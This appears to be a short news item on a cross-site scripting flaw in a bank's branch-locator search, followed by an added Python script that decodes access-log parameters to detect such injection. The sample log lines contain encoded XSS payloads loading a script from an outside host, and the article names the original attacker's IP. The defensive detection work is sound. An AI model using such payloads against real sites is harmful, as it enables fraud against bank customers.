Online Banking Industry Very Vulnerable to Cross-Site Scripting Frauds
The script being exploited allows visitors to search for Citizens Bank branch offices in their town. Branch locator pages, like search scripts in general, are frequently coded carelessly, and they are targets for fraudsters who actively analyze financial web sites for weaknesses.
In this case, a coding oversight in the Citizens Bank application allows an attacker to inject JavaScript into the URL, which is then executed by customers' web browsers. The injected commands that follow "CitizensBank.com" in the URL are hex-encoded to evade detection; once decoded, they load a JavaScript file (city.js) from a server at the IP address 82.184.108.158.
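A defender-side check for the kind of encoded payload described above, added here as an example (not code from the original article, from Netcraft, or from Citizens Bank): it repeatedly percent-decodes each query parameter of a web-server access log entry, so hex or double encoding cannot hide the payload, and flags values that carry a script tag or an external script load. The log lines, the path /branch/locator.asp and the IP addresses are constructed.

```python
"""Flag hex-encoded reflected-XSS attempts in web server access logs.
Added example; the log lines, path and addresses below are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Markers that indicate script injection once the parameter is decoded.
SCRIPT_MARKERS = re.compile(
    r"<\s*script|javascript\s*:|\bon\w+\s*=|\.js\b", re.IGNORECASE)
# A src attribute pointing at another host: the page's payload loaded
# city.js from an external server rather than inline code.
EXTERNAL_SRC = re.compile(r"src\s*=\s*['\"]?(https?:)?//", re.IGNORECASE)
# Request line of the common/combined log format.
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines: one benign search, one hex-encoded
# payload, one double-encoded payload from the same client.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2005:12:00:01 +0000] "GET /branch/locator.asp'
    '?city=Boston&state=MA HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2005:12:00:02 +0000] "GET /branch/locator.asp'
    '?city=%3Cscript%20src%3D%22http%3A%2F%2F198.51.100.9%2Fcity.js%22%3E'
    '%3C%2Fscript%3E HTTP/1.1" 200 5233',
    '198.51.100.7 - - [10/Jan/2005:12:00:03 +0000] "GET /branch/locator.asp'
    '?city=%253Cscript%2520src%253D%2522//198.51.100.9/city.js%2522%253E'
    ' HTTP/1.1" 200 5233',
]


def full_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (defeats double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_url(url: str) -> dict:
    """Return {param: decoded_value} for parameters that look like injection."""
    hits = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = full_decode(raw)  # parse_qsl already decoded one layer
        if SCRIPT_MARKERS.search(decoded) or EXTERNAL_SRC.search(decoded):
            hits[name] = decoded
    return hits


def scan_log(lines) -> list:
    """Return (client_ip, suspicious_params) for each flagged log line."""
    findings = []
    for line in lines:
        match = LOG_REQUEST.search(line)
        if match:  # host is only needed so urlsplit can find the query
            hits = inspect_url("http://example.invalid" + match.group(1))
            if hits:
                findings.append((line.split()[0], hits))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags both payload lines from 198.51.100.7 and leaves the benign Boston search alone.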
The link for this article located at netcraft.com is no longer available.